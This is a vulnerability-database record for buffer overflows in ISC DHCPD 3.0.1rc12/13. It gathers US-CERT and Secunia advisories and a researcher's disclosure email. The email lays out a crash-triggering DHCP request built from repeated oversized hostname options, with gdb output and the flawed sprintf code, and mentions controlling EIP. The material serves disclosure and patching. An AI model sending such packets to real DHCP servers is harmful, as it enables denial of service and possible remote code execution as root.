        "date": "2011-04-07T15:19:36",
        "db": "PACKETSTORM",
        "id": "100160",
        "ident": null
      },
      {
        "date": "2011-04-11T14:45:39",
        "db": "PACKETSTORM",
        "id": "100273",
        "ident": null
      },
      {
        "date": "2013-01-09T02:26:37",
        "db": "PACKETSTORM",
        "id": "119354",
        "ident": null
      },
      {
        "date": "2011-11-15T05:14:36",
        "db": "PACKETSTORM",
        "id": "106987",
        "ident": null
      },
      {
        "date": "2011-04-11T14:46:07",
        "db": "PACKETSTORM",
        "id": "100274",
        "ident": null
      },
      {
        "date": "2011-04-06T08:45:32",
        "db": "PACKETSTORM",
        "id": "100149",
        "ident": null
      },
      {
        "date": "2011-04-11T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201104-043",
        "ident": null
      },
      {
        "date": "2011-11-28T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2011-003066",
        "ident": null
      },
      {
        "date": "2011-04-08T15:17:27.387000",
        "db": "NVD",
        "id": "CVE-2011-0997",
        "ident": null
      }
    ]
  },
  "sources_update_date": {
    "_id": null,
    "data": [
      {
        "date": "2011-05-06T00:00:00",
        "db": "CERT/CC",
        "id": "VU#107886",
        "ident": null
      },
      {
        "date": "2020-04-01T00:00:00",
        "db": "VULMON",
        "id": "CVE-2011-0997",
        "ident": null
      },
      {
        "date": "2020-04-03T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201104-043",
        "ident": null
      },
      {
        "date": "2011-11-28T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2011-003066",
        "ident": null
      },
      {
        "date": "2025-04-11T00:51:21.963000",
        "db": "NVD",
        "id": "CVE-2011-0997",
        "ident": null
      }
    ]
  },
  "threat_type": {
    "_id": null,
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "100160"
      },
      {
        "db": "PACKETSTORM",
        "id": "119354"
      },
      {
        "db": "PACKETSTORM",
        "id": "106987"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201104-043"
      }
    ],
    "trust": 0.9
  },
  "title": {
    "_id": null,
    "data": "ISC dhclient vulnerability",
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#107886"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "_id": null,
    "data": "input validation error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201104-043"
      }
    ],
    "trust": 0.6
  }
}

VAR-200408-0175

Vulnerability from variot - Updated: 2025-04-03 22:09

The DHCP daemon (DHCPD) for ISC DHCP 3.0.1rc12 and 3.0.1rc13, when compiled in environments that do not provide the vsnprintf function, uses C include files that define vsnprintf to use the less safe vsprintf function, which can lead to buffer overflow vulnerabilities that enable a denial of service (server crash) and possibly execute arbitrary code. The Internet Systems Consortium's (ISC) Dynamic Host Configuration Protocol (DHCP) 3 application contains a buffer overflow vulnerability. As a result, you may gain administrative privileges on vulnerable systems. On systems which lack the vsnprintf() library call, ISC DHCPD defines vsnprintf as:

    #define vsnprintf(buf, size, fmt, list) vsprintf (buf, fmt, list)

This definition discards the size argument to the function, potentially allowing any occurrence of vsnprintf() to be exploitable, by overflowing whatever intended buffer is passed to the library call. Other locations in DHCPD utilizing this function may be exploitable. This issue is reported to affect ISC DHCPD versions 3.0.1rc12 and 3.0.1rc13. ISC DHCP calls vsnprintf() to write format log file strings.
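The consequence of dropping the size argument, shown as an added example that is not ISC's code: it measures what an unbounded `vsprintf()` would store for a log line built from reassembled hostname options, then formats the same line with a real bounded call and checks that truncation is reported and adjacent memory is untouched. The helper names, the log format string, and the seven 150-byte options are constructed for illustration.

```c
#include <stdarg.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MSGBUF_SIZE 1024  /* fixed log buffer size quoted in the advisory */
#define OPT_MAX     255   /* maximum payload of a single DHCP option */
#define LOG_FMT     "DHCPREQUEST for %s from %s (%s) via %s"  /* constructed */

enum fmt_status { FMT_OK = 0, FMT_TRUNCATED = 1, FMT_ERROR = -1 };
struct opt { const char *data; size_t len; };  /* one option payload (hypothetical type) */

/* Bytes, including the NUL, that an unbounded vsprintf() would store. */
static size_t unbounded_write_size(const char *fmt, ...)
{
    va_list ap;
    int n;
    va_start(ap, fmt);
    n = vsnprintf(NULL, 0, fmt, ap);   /* measure only, writes nothing */
    va_end(ap);
    return n < 0 ? 0 : (size_t)n + 1;
}

/* Bounded formatter: never writes past dst[cap-1] and reports truncation. */
static enum fmt_status log_format(char *dst, size_t cap, const char *fmt, ...)
{
    va_list ap;
    int n;
    if (dst == NULL || cap == 0)
        return FMT_ERROR;
    va_start(ap, fmt);
    n = vsnprintf(dst, cap, fmt, ap);
    va_end(ap);
    if (n < 0) {
        dst[0] = '\0';
        return FMT_ERROR;
    }
    return (size_t)n >= cap ? FMT_TRUNCATED : FMT_OK;
}

/* Concatenate repeated options into dst; refuse instead of overrunning cap.
 * Returns the reassembled length, or -1 if an option or the total is too big. */
static long concat_options(char *dst, size_t cap, const struct opt *opts, size_t count)
{
    size_t used = 0, i;
    if (dst == NULL || cap == 0)
        return -1;
    for (i = 0; i < count; i++) {
        if (opts[i].len > OPT_MAX || opts[i].len >= cap - used)
            return -1;                 /* always keep one byte for the NUL */
        memcpy(dst + used, opts[i].data, opts[i].len);
        used += opts[i].len;
    }
    dst[used] = '\0';
    return (long)used;
}

struct demo_result {
    long hostname_len;       /* bytes after reassembly */
    size_t needed;           /* what the vsprintf() shim would have stored */
    enum fmt_status status;  /* outcome of the bounded call */
    size_t logged_len;       /* length actually placed in msgbuf */
    int canary_intact;       /* 1 if memory after msgbuf is unchanged */
};

static struct demo_result run_demo(void)
{
    /* canary sits directly after msgbuf, like neighbouring stack data */
    struct { char msgbuf[MSGBUF_SIZE]; unsigned char canary[8]; } frame;
    static char chunk[150];      /* constructed sample option payload */
    static char hostname[2048];  /* reassembly buffer, larger than msgbuf */
    struct opt opts[7];
    struct demo_result r;
    size_t i;

    memset(chunk, 'A', sizeof chunk);
    for (i = 0; i < 7; i++) {
        opts[i].data = chunk;
        opts[i].len = sizeof chunk;
    }
    memset(frame.canary, 0xA5, sizeof frame.canary);

    r.hostname_len = concat_options(hostname, sizeof hostname, opts, 7);
    r.needed = unbounded_write_size(LOG_FMT, "192.168.0.99",
                                    "ff:ff:ff:ff:ff:ff", hostname, "eth0");
    r.status = log_format(frame.msgbuf, sizeof frame.msgbuf, LOG_FMT,
                          "192.168.0.99", "ff:ff:ff:ff:ff:ff", hostname, "eth0");
    r.logged_len = strlen(frame.msgbuf);
    r.canary_intact = 1;
    for (i = 0; i < sizeof frame.canary; i++)
        if (frame.canary[i] != 0xA5)
            r.canary_intact = 0;
    return r;
}

int main(void)
{
    struct demo_result r = run_demo();
    printf("hostname=%ld needed=%lu cap=%d status=%d logged=%lu canary=%d\n",
           r.hostname_len, (unsigned long)r.needed, MSGBUF_SIZE,
           (int)r.status, (unsigned long)r.logged_len, r.canary_intact);
    return 0;
}
```

A caller that receives `FMT_TRUNCATED` can log the shortened line or drop the request; either way the write stays inside the buffer, which is the guarantee the macro removed.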




TITLE: XEROX WorkCentre Products Multiple Vulnerabilities

SECUNIA ADVISORY ID: SA23265

VERIFY ADVISORY: http://secunia.com/advisories/23265/

CRITICAL: Moderately critical

IMPACT: Security Bypass, Manipulation of data, Exposure of system information, Exposure of sensitive information, DoS, System access

WHERE:

From local network

OPERATING SYSTEM: Xerox WorkCentre http://secunia.com/product/4746/ Xerox WorkCentre Pro http://secunia.com/product/4553/

DESCRIPTION: Some vulnerabilities and weaknesses have been reported in various XEROX WorkCentre products, which can be exploited by malicious people to bypass certain security restrictions, expose certain sensitive information, cause a DoS (Denial of Service), and compromise a vulnerable system.

1) Input passed to the TCP/IP hostname, the Scan-to-mailbox folder name field, and to the Microsoft Network configuration parameters in the Web User interface is not properly sanitised.

2) Certain browser settings may allow unauthorized access. Additionally, an unspecified vulnerability in the Web User Interface can be exploited to bypass the authentication.

3) The TFTP/BOOTP auto configuration can be exploited to manipulate certain configuration settings.

4) An unspecified error within the handling of email signatures can be exploited to display improper items.

5) Requests to web services can be made through HTTP instead of HTTPS. Other unspecified HTTP security issues and a httpd.conf misconfiguration are also reported.

6) An error within the Scan-to-mailbox feature can be exploited to anonymously download secure files. Additionally, it is possible to anonymously download audit log files.

7) The system fails to keep accurate time resulting in incorrect time stamps in audit logs.

8) The embedded Samba version contains various vulnerabilities. Additionally, the SMB "Homes" share is visible and it's possible to browse the file system via SMB.

9) The SNMP agent does not return errors for non-writable objects. Additionally, authentication failure traps can't be enabled or generated.

10) An error within ops3-dmn can be exploited to crash the service and cause a DoS by attaching a PS script.

11) It is possible to bypass the security restriction and boot Alchemy by e.g. using an USB thumb drive.

12) The "Validate Repository SSL Certificate" scan feature does not verify the FQDN.

13) Certain problems with the Immediate Image Overwrite and On Demand Image Overwrite, a Postgress port block, and a http TRACE XSS attack in the network controller are reported.

14) Two boundary errors within the embedded DHCP implementation can be exploited to cause a buffer overflow, which may allow execution of arbitrary code.

SOLUTION: Apply updated software (see vendor advisories for detailed instructions).

PROVIDED AND/OR DISCOVERED BY: Reported by the vendor.

ORIGINAL ADVISORY: Xerox: http://www.xerox.com/downloads/usa/en/c/cert_XRX06_006_v1b.pdf http://www.xerox.com/downloads/usa/en/c/cert_XRX06_004_v11.pdf





           Technical Cyber Security Alert TA04-174A
            Multiple Vulnerabilities in ISC DHCP 3

Original release date: June 22, 2004
Last revised: --
Source: US-CERT

Systems Affected

 * ISC DHCP versions 3.0.1rc12 and 3.0.1rc13

Overview

Two vulnerabilities in the ISC DHCP allow a remote attacker to cause a denial of the DHCP service on a vulnerable system. It may be possible to exploit these vulnerabilities to execute arbitrary code on the system.

I.

VU#317350 discusses a buffer overflow vulnerability in the temporary storage of log lines. In transactions, ISC DHCPD logs every DHCP packet along with several pieces of descriptive information. The client's DISCOVER and the resulting OFFER, REQUEST, ACK, and NAKs are all logged. In all of these messages, if the client supplied a hostname, then it is also included in the logged line. As part of the DHCP datagram format, a client may specify multiple hostname options, up to 255 bytes per option. These options are concatenated by the server. If the hostname and options contain only ASCII characters, then the string will pass non-ASCII character filters and be temporarily stored in 1024 byte fixed-length buffers on the stack. If a client supplies enough hostname options, it is possible to overflow the fixed-length buffer.

VU#654390 discusses C include files for systems that do not support the bounds checking vsnprintf() function. These files define the bounds checking vsnprintf() to the non-bounds checking vsprintf() function. Since vsprintf() is a function that does not check bounds, the size is discarded, creating the potential for a buffer overflow when client data is supplied. Note that the vsnprintf() statements are defined after the vulnerable code that is discussed in VU#317350. Since the preconditions for this vulnerability are similar to those required to exploit VU#317350, these buffer overflow conditions occur sequentially in the code after the buffer overflow vulnerability discussed in VU#317350, and these issues were discovered and resolved at the same time, there is no known exploit path to exploit these buffer overflow conditions caused by VU#654390. Note that VU#654390 was discovered and exploitable once VU#317350 was resolved.

For both of the vulnerabilities, only ISC DHCP 3.0.1rc12 and ISC DHCP 3.0.1rc13 are believed to be vulnerable. VU#317350 is exploitable for all operating systems and configurations. VU#654390 is only defined for the following operating systems:

 * AIX
 * AlphaOS
 * Cygwin32
 * HP-UX
 * Irix
 * Linux
 * NextStep
 * SCO
 * SunOS 4
 * SunOS 5.5
 * Ultrix

All versions of ISC DHCP 3, including all snapshots, betas, and release candidates, contain the flawed code.

US-CERT is tracking these issues as VU#317350, which has been assigned CVE CAN-2004-0460, and VU#654390, which has been assigned CVE CAN-2004-0461.

II.

III. Solution

Apply patches or upgrade

These issues have been resolved in ISC DHCP 3.0.1rc14. Your vendor may provide specific patches or updates. For vendor-specific information, please see your vendor's site, or look for your vendor information in VU#317350 and VU#654390. As vendors report new information to US-CERT, we will update the vulnerability notes.

Appendix B. References

 * http://www.isc.org/sw/dhcp/
 * http://www.kb.cert.org/vuls/id/317350
 * http://www.kb.cert.org/vuls/id/654390

US-CERT thanks Gregory Duchemin and Solar Designer for discovering, reporting, and resolving this vulnerability. Thanks also to David Hankins of ISC for notifying us of this vulnerability and the technical information provided to create this document.


Feedback can be directed to the author: Jason A. Rafail


The latest version of this document can be found at:

 <http://www.us-cert.gov/cas/techalerts/TA04-174A.html>

Copyright 2004 Carnegie Mellon University.

Terms of use:

 <http://www.us-cert.gov/legal.html>

Revision History

June 22, 2004: Initial release

Hi, for those interested to reproduce the recent DOS attacks against ISC DHCPD 3.0.1 rc12 and rc13 as described in: http://www.kb.cert.org/vuls/id/317350 , I'm forwarding the first email I sent to ISC describing several stack based buffer overflows occurring during the creation of log messages and triggered by sending several DHCP HOSTNAME options within a single request. This mail also includes a trace of such DHCP REQUEST.

Other .bss overflows related to vsnprintf and identified later during our investigations as described in: http://www.kb.cert.org/vuls/id/654390 can be triggered the exact same way. Note that the home made tool I am referencing in this email will be made available very soon and already includes ISC, INFOBLOX and DLINK dhcp vulnerabilities. I will drop a note here when it is finally released. Cheers, Gregory

Special thanks to Solar Designer and David W.Hankins (ISC)

--- Original email ------

Summary:

I have discovered several stack based overflows in your dhcp-3.0.1rc12 and rc13 (may be others, have not checked). These vulnerabilities can be easily triggered by crafting a dhcp discover or request packet which carries several hostname dhcp options that, once reassembled by the daemon (as explained in rfc 3396), overflow a stack based variable causing the daemon to crash. I believe that one might execute code remotely on the server with the same user account dhcpd is running with, root in most cases. I have been able at some points during the tests, to control eip's 4 bytes (intel 32bits arch), it was during the ddns forward update operation. Note that all tests have been made on a linux 2.4.20-24.9 using a home made tool to generate custom dhcp traffic.

Now an example:

see dhcpd.conf in attachment if you need it.

structure of an offending packet (case of a dhcp request based attack)

DHCP request from 0.0.0.0:68 (ff:ff:ff:ff:ff:ff) to 255.255.255.255:67 (ff:ff:ff:ff:ff:ff)

op : BOOT REQUEST (1) htype : Ethernet (10Mb) (1) hlen : 6 hops : 0 xid : 0x00000000 secs : 1 flags : UNICAST (0x0000) ciaddr : 0.0.0.0 yiaddr : 0.0.0.0 siaddr : 255.255.255.255 giaddr : 0.0.0.0 chaddr : ff:ff:ff:ff:ff:ff sname : file : cookie : 0x63825363 (RFC 1497/2132, BOOTP Vendor informations/DHCP options) DHCP option (053 [0x35]) : MESSAGE_TYPE : REQUEST BOOTP option (012 [0x0c]) : HOSTNAME : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA BOOTP option (012 [0x0c]) : HOSTNAME : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA BOOTP option (012 [0x0c]) : HOSTNAME : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA BOOTP option (012 [0x0c]) : HOSTNAME : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA BOOTP option (012 [0x0c]) : HOSTNAME : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA BOOTP option (012 [0x0c]) : HOSTNAME : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA BOOTP option (012 [0x0c]) : HOSTNAME : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA DHCP option (050 [0x32]) : REQUEST_IP : 192.168.0.99

sending this packet to the ptraced daemon (within gdb) gives:

(gdb) run -f -d The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /usr/sbin/dhcpd -f -d Internet Software Consortium DHCP Server V3.0.1rc13 Copyright 1995-2003 Internet Software Consortium. All rights reserved. For info, please visit http://www.isc.org/products/DHCP Wrote 0 deleted host decls to leases file. Wrote 0 new dynamic host decls to leases file. Wrote 0 leases to leases file. Listening on LPF/eth0/00:0d:88:b5:95:0c/192.168.0.0/24 Sending on LPF/eth0/00:0d:88:b5:95:0c/192.168.0.0/24 Sending on Socket/fallback/fallback-net Unable to add forward map from bobAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NANAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-1022AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8 860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-284AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1.92E302E383631P-108AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1.92E302E383631P-108NANAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1.92E302E383631P-108NAN0X1.1E4600811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1. 
92E302E383631P-108NAN0X1.1E4600811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0X1.1DEF80811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1.92E302E383631P-108NAN0X1.1E4600811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0X1.1DEF80811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-0X1.FDE880811DEF8P+0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1.92E302E383631P-108NAN0X1.1E4600811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0X1.1DEF80811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-0X1.FDE880811DEF8P+0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-0X1.FDE2008071205P+0A.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1.92E302E383631P-108NAN0X1.1E4600811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0X1.1DEF80811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-0X 1.FDE880811DEF8P+0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-0X1.FDE2008071205P+0A.zob.com.0X1.

    Program received signal SIGSEGV, Segmentation fault.
    0x080add76 in hash_lookup (vp=0xbfffde24, table=0x38322d50, name=0x8149dac "\001\xff\xff\xff\xff\xff\xff", len=7, file=0x80bbe25 "mdb.c", line=1662) at hash.c:363
    363         hashno = (*table -> do_hash) (name, len, table -> hash_count);
    (gdb)

backtracing stack show:

    (gdb) bt
    #0  0x080add76 in hash_lookup (vp=0xbfffde24, table=0x38322d50,
        name=0x8149dac "\001\xff\xff\xff\xff\xff\xff", len=7, file=0x80bbe25 "mdb.c", line=1662) at hash.c:363
    #1  0x0806fb0a in lease_hash_lookup (ptr=0xbfffde24, table=0x38322d50,
        buf=0x8149dac "\001\xff\xff\xff\xff\xff\xff", len=7, file=0x80bbe25 "mdb.c", line=1662) at mdb.c:2055
    #2  0x0806eb5b in find_lease_by_hw_addr (lp=0xbfffde24, hwaddr=0x8149dac
        "\001\xff\xff\xff\xff\xff\xff", hwlen=7, file=0x80bbe25 "mdb.c", line=1662) at mdb.c:1574
    #3  0x0806ee5f in hw_hash_add (lease=0x8149d30) at mdb.c:1661
    #4  0x0806d959 in supersede_lease (comp=0x8149d30, lease=0x811def8,
        commit=1, propogate=1, pimmediate=1) at mdb.c:969
    #5  0x08050cb9 in ack_lease (packet=0x811d6e0, lease=0x8149d30, offer=5,
        when=0, msg=0xbfffdfd0 "DHCPREQUEST for 192.168.0.99 from ff:ff:ff:ff:ff:ff via eth0", ms_nulltp=0) at dhcp.c:2227
    #6  0x0804d041 in dhcprequest (packet=0x811d6e0, ms_nulltp=0,
        ip_lease=0x0) at dhcp.c:662
    #7  0x0804c37d in dhcp (packet=0x811d6e0) at dhcp.c:224
    #8  0x08088d9a in do_packet (interface=0x811d568, packet=0xbfffe580,
        len=1430, from_port=17408, from= {len = 4, iabuf = '\0' }, hfrom=0xbffff5b0) at options.c:2237
    #9  0x08096718 in got_one (h=0x811d568) at discover.c:785
    #10 0x080a937e in omapi_one_dispatch (wo=0x0, t=0x0) at dispatch.c:418
    #11 0x0807cce3 in dispatch () at dispatch.c:103
    #12 0x0804add1 in main (argc=3, argv=0xbffff904, envp=0xbffff914) at
        dhcpd.c:614
    #13 0x42015574 in __libc_start_main () from /lib/tls/libc.so.6
    (gdb)

Note that the daemon may actually crash at a different location depending on the first corrupted structure it meets and therefore, on the size of the malicious option sent, along with the context (type of packet, leases in use etc...).

Problems in the source: I have spent quite some time to find out where the overflow actually takes its roots, here are my findings:

file server/dhcp.c: function dhcprequest :

    char msgbuf [1024]; /* XXX */
    char *s;

....

    if (lease && lease -> client_hostname &&
        db_printable (lease -> client_hostname))
            s = lease -> client_hostname;
    else
            s = (char *)0;

......

    sprintf (msgbuf, "DHCPREQUEST for %s%s from %s %s%s%svia %s",
             piaddr (cip), smbuf,
             (packet -> raw -> htype
              ? print_hw_addr (packet -> raw -> htype,
                               packet -> raw -> hlen,
                               packet -> raw -> chaddr)
              : (lease
                 ? print_hex_1 (lease -> uid_len, lease -> uid,
                                lease -> uid_len)
                 : "")),
             s ? "(" : "", s ? s : "", s ? ") " : "",
             packet -> raw -> giaddr.s_addr
             ? inet_ntoa (packet -> raw -> giaddr)
             : packet -> interface -> name);

To summarize, s is referencing the reassembled hostname option passed to the daemon, after which it is used as is in sprintf and stored in msgbuf (fixed size) without any length checking. Local msgbuf can obviously be overrun, corrupting various structures in stack and eventually causing the server to crash. Note that the call to db_printable( ), filtering hostname, may render the task harder to root a server but likely not impossible. Also being able to corrupt structures like lease or oc may have interesting side effects from an attacker perspective.

    void dhcprequest (packet, ms_nulltp, ip_lease)
            struct packet *packet;
            int ms_nulltp;
            struct lease *ip_lease;
    {
            struct lease *lease;
            struct iaddr cip;
            struct iaddr sip;
            struct subnet *subnet;
            int ours = 0;
            struct option_cache *oc;
            struct data_string data;
            int status;
            char msgbuf [1024]; /* XXX */
            char *s;
            char smbuf [19];

....

The very same problem is present in dhcpdiscover( ), dhcpdecline( ), dhcprequest( ), dhcprelease( ), ... Please look at the diff in unified format, attached to this email, for a detailed list.


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
